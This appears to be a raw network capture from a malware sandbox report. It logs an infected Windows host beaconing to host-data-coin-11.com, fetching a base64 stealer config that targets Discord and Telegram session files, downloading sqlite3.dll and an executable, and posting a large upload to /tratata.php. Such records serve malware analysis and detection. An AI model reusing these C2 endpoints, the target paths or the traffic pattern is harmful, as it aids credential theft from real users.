75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
40	192.168.2.4	49796	95.213.165.249	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 1, 2021 09:14:19.923051119 CET	5684	OUT	GET /tratata.php HTTP/1.1 Host: file-file-host4.com Connection: Keep-Alive
Dec 1, 2021 09:14:20.026211023 CET	5843	IN	HTTP/1.1 200 OK Server: nginx/1.20.2 Date: Wed, 01 Dec 2021 08:14:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=t42nernt19g8nsbjut69kb7u9v; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Vary: Accept-Encoding Data Raw: 63 34 0d 0a 4d 58 77 78 66 44 46 38 4d 58 78 45 61 58 4e 6a 62 33 4a 6b 66 44 42 38 4a 55 46 51 55 45 52 42 56 45 45 6c 58 47 52 70 63 32 4e 76 63 6d 52 63 54 47 39 6a 59 57 77 67 55 33 52 76 63 6d 46 6e 5a 56 78 38 4b 6e 77 78 66 44 42 38 4d 48 78 55 5a 57 78 6c 5a 33 4a 68 62 58 77 77 66 43 56 42 55 46 42 45 51 56 52 42 4a 56 78 55 5a 57 78 6c 5a 33 4a 68 62 53 42 45 5a 58 4e 72 64 47 39 77 58 48 52 6b 59 58 52 68 58 48 77 71 52 44 67 33 4e 30 59 33 4f 44 4e 45 4e 55 51 7a 52 55 59 34 51 79 6f 73 4b 6d 31 68 63 43 6f 73 4b 6d 4e 76 62 6d 5a 70 5a 33 4d 71 66 44 46 38 4d 48 77 77 66 41 3d 3d 0d 0a 30 0d 0a 0d 0a Data Ascii: c4MXwxfDF8MXxEaXNjb3JkfDB8JUFQUERBVEElXGRpc2NvcmRcTG9jYWwgU3RvcmFnZVx8KnwxfDB8MHxUZWxlZ3JhbXwwfCVBUFBEQVRBJVxUZWxlZ3JhbSBEZXNrdG9wXHRkYXRhXHwqRDg3N0Y3ODNENUQzRUY4QyosKm1hcCosKmNvbmZpZ3MqfDF8MHwwfA==0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
41	192.168.2.4	49797	95.213.165.249	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 1, 2021 09:14:20.137711048 CET	6082	OUT	GET /sqlite3.dll HTTP/1.1 Host: file-file-host4.com Cache-Control: no-cache Cookie: PHPSESSID=t42nernt19g8nsbjut69kb7u9v
Dec 1, 2021 09:14:20.224169970 CET	6321	IN	HTTP/1.1 200 OK Server: nginx/1.20.2 Date: Wed, 01 Dec 2021 08:14:20 GMT Content-Type: application/x-msdos-program Content-Length: 645592 Connection: close Last-Modified: Thu, 21 Oct 2021 11:48:30 GMT ETag: "9d9d8-5cedb79317f80" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 13 00 ea 98 3d 53 00 76 08 00 3f 0c 00 00 e0 00 06 21 0b 01 02 15 00 d0 06 00 00 e0 07 00 00 06 00 00 58 10 00 00 00 10 00 00 00 e0 06 00 00 00 90 60 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 20 09 00 00 06 00 00 38 c3 0a 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 b0 07 00 98 19 00 00 00 d0 07 00 4c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 00 fc 27 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 07 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac d1 07 00 70 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c0 ce 06 00 00 10 00 00 00 d0 06 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 30 60 2e 64 61 74 61 00 00 00 b0 0f 00 00 00 e0 06 00 00 10 00 00 00 d6 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 c0 2e 72 64 61 74 61 00 00 24 ad 00 00 00 f0 06 00 00 ae 00 00 00 e6 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 40 2e 62 73 73 00 00 00 00 98 04 00 00 00 a0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 40 c0 2e 65 64 61 74 61 00 00 98 19 00 00 00 b0 07 00 00 1a 00 00 00 94 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 4c 0a 00 00 00 d0 07 00 00 0c 00 00 00 ae 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 18 00 00 00 00 e0 07 00 00 02 00 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 f0 07 00 00 02 00 00 00 bc 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 fc 27 00 00 00 00 08 00 00 28 00 00 00 be 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 60 01 00 00 00 30 08 00 00 02 00 00 00 e6 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 c8 03 00 00 00 40 08 00 00 04 00 00 00 e8 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 35 00 00 00 00 00 4d 06 00 00 00 50 08 00 00 08 00 00 00 ec 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 35 31 00 00 00 00 00 60 43 00 00 00 60 08 00 00 44 00 00 00 f4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 36 33 00 00 00 00 00 84 0d 00 00 00 b0 08 00 00 0e 00 00 00 38 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 37 37 00 00 00 00 00 94 0b 00 00 00 c0 08 00 00 0c 00 00 00 46 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 39 00 00 00 00 00 04 05 00 00 00 d0 08 00 00 06 00 00 00 52 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 31 30 32 00 00 00 00 0d 01 00 00 00 e0 08 00 00 02 00 00 00 58 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 31 31 33 00 00 00 00 db 19 00 00 00 f0 08 00 00 1a 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL=Sv?!X` 8 L'p.text`0`.data@@.rdata$@@@.bss@.edata@0@.idataL@0.CRT@0.tls @0.reloc'(@0B/4`0@@B/19@@B/35MP@B/51`C`D@B/638@B/77F@B/89R@0B/102X@B/113

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
42	192.168.2.4	49798	95.213.165.249	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 1, 2021 09:14:26.490838051 CET	7313	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://pborgy.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 200 Host: host-data-coin-11.com
Dec 1, 2021 09:14:26.590754986 CET	7314	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Wed, 01 Dec 2021 08:14:26 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
43	192.168.2.4	49799	95.213.165.249	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 1, 2021 09:14:26.680505037 CET	7315	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://hqppgl.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 216 Host: host-data-coin-11.com
Dec 1, 2021 09:14:26.781894922 CET	7315	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Wed, 01 Dec 2021 08:14:26 GMT Content-Type: text/html; charset=utf-8 Content-Length: 0 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
44	192.168.2.4	49800	95.213.165.249	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 1, 2021 09:14:26.937504053 CET	7316	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ybcka.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 275 Host: host-data-coin-11.com
Dec 1, 2021 09:14:27.039542913 CET	7317	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Wed, 01 Dec 2021 08:14:27 GMT Content-Type: text/html; charset=utf-8 Content-Length: 0 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
45	192.168.2.4	49801	95.213.165.249	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 1, 2021 09:14:27.149297953 CET	7318	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://buintdmfv.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 128 Host: host-data-coin-11.com
Dec 1, 2021 09:14:27.250431061 CET	7318	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Wed, 01 Dec 2021 08:14:27 GMT Content-Type: text/html; charset=utf-8 Content-Length: 0 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
46	192.168.2.4	49802	95.213.165.249	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 1, 2021 09:14:27.433342934 CET	7319	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://slymqhed.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 285 Host: host-data-coin-11.com
Dec 1, 2021 09:14:27.534075975 CET	7320	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Wed, 01 Dec 2021 08:14:27 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
47	192.168.2.4	49803	95.213.165.249	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 1, 2021 09:14:27.630956888 CET	7321	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://oamtqaba.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 273 Host: host-data-coin-11.com
Dec 1, 2021 09:14:27.734807014 CET	7322	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Wed, 01 Dec 2021 08:14:27 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
48	192.168.2.4	49804	95.213.165.249	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 1, 2021 09:14:27.908968925 CET	7323	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://xuobblxeto.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 132 Host: host-data-coin-11.com
Dec 1, 2021 09:14:28.010453939 CET	7323	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Wed, 01 Dec 2021 08:14:27 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c9 88 55 13 26 14 f9 aa 89 ff a2 1e b7 08 93 31 f9 55 50 99 4a f7 e0 25 e5 39 1a 4b ef a8 8d 70 bc 57 da 4a d5 fe 24 85 21 ed c3 95 53 2f e5 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OU&1UPJ%9KpWJ$!S/c0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
49	192.168.2.4	49805	95.213.165.249	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 1, 2021 09:14:28.136903048 CET	7324	OUT	GET /files/5311_1638303032_7343.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: host-file-host-3.com
Dec 1, 2021 09:14:28.219403028 CET	7325	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Wed, 01 Dec 2021 08:14:28 GMT Content-Type: application/x-msdos-program Content-Length: 1143000 Connection: close Last-Modified: Tue, 30 Nov 2021 20:10:32 GMT ETag: "1170d8-5d2072645dc9e" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 70 1c 69 a3 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 30 00 00 60 11 00 00 06 00 00 00 00 00 00 9e 7e 11 00 00 20 00 00 00 80 11 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 11 00 00 02 00 00 09 35 12 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 0f 00 00 00 00 00 00 00 00 00 00 00 50 7e 11 00 4b 00 00 00 00 80 11 00 bc 02 00 00 00 00 00 00 00 00 00 00 00 68 11 00 d8 08 00 00 00 a0 11 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a4 5e 11 00 00 20 00 00 00 60 11 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 bc 02 00 00 00 80 11 00 00 04 00 00 00 62 11 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 11 00 00 02 00 00 00 66 11 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 7e 11 00 00 00 00 00 48 00 00 00 02 00 05 00 00 18 02 00 dc 5f 05 00 03 00 00 00 da 07 00 06 dc 77 07 00 eb 89 06 00 c1 7d 11 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 42 28 89 08 00 06 7e 53 02 00 04 28 81 0c 00 06 2a 00 00 00 13 30 04 00 04 00 00 00 00 00 00 00 00 00 14 2a 42 28 89 08 00 06 7e 53 02 00 04 28 81 0c 00 06 2a 00 00 00 12 00 00 17 2a 00 00 00 42 28 89 08 00 06 7e 53 02 00 04 28 81 0c 00 06 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 04 00 04 00 00 00 00 00 00 00 00 00 17 2a 13 30 04 00 04 00 00 00 00 00 00 00 00 00 17 2a 13 30 04 00 04 00 00 00 00 00 00 00 00 00 16 2a 42 28 89 08 00 06 7e 53 02 00 04 28 81 0c 00 06 2a 00 00 00 12 00 00 17 2a 00 00 00 12 00 00 14 2a 00 00 00 12 00 00 14 2a 00 00 00 13 30 04 00 04 00 00 00 00 00 00 00 00 00 14 2a 42 28 89 08 00 06 7e 53 02 00 04 28 81 0c 00 06 2a 00 00 00 12 00 00 17 2a 00 00 00 13 30 04 00 04 00 00 00 00 00 00 00 00 00 17 2a 13 30 04 00 04 00 00 00 00 00 00 00 00 00 17 2a 13 30 0a 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 0d 00 04 00 00 00 00 00 00 00 00 00 14 2a 42 28 89 08 00 06 7e 53 02 00 04 28 81 0c 00 06 2a 00 00 00 13 30 04 00 04 00 00 00 00 00 00 00 00 00 00 2a 03 30 04 00 04 00 00 00 00 00 00 00 00 00 00 2a 42 28 89 08 00 06 7e 53 02 00 04 28 81 0c 00 06 2a 00 00 00 13 30 02 00 04 00 00 00 00 00 00 00 00 00 14 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 17 2a 13 30 03 00 04 00 00 00 00 00 00 00 00 00 17 2a 12 00 00 14 2a 00 00 00 42 28 89 08 00 06 7e 53 02 00 04 28 81 0c 00 06 2a 00 00 00 13 30 05 00 04 00 00 00 00 00 00 00 00 00 17 2a 13 30 05 00 04 00 00 00 00 00 00 00 00 00 17 2a 13 30 05 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELpi0`~ @ 5@P~Kh H.text^ ` `.rsrcb@.relocf@B~H_w}B(~S(0B(~S(B(~S(000B(~S(***0B(~S(*0000B(~S(00B(~S(000B(~S(000

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.4	49760	95.213.165.249	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 1, 2021 09:13:56.216691017 CET	1084	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ggigae.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 364 Host: host-data-coin-11.com
Dec 1, 2021 09:13:56.318475008 CET	1085	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Wed, 01 Dec 2021 08:13:56 GMT Content-Type: text/html; charset=utf-8 Content-Length: 0 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
50	192.168.2.4	49809	95.213.165.249	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 1, 2021 09:14:32.314840078 CET	8555	OUT	POST /tratata.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----Q9RQQIMOZU3E3EKX Host: file-file-host4.com Content-Length: 104683 Connection: Keep-Alive Cache-Control: no-cache Cookie: PHPSESSID=t42nernt19g8nsbjut69kb7u9v
Dec 1, 2021 09:14:32.589039087 CET	8663	IN	HTTP/1.1 200 OK Server: nginx/1.20.2 Date: Wed, 01 Dec 2021 08:14:32 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: close Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
51	192.168.2.4	49810	95.213.165.249	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Dec 1, 2021 09:14:32.488334894 CET	8658	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://clekn.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 318 Host: host-data-coin-11.com
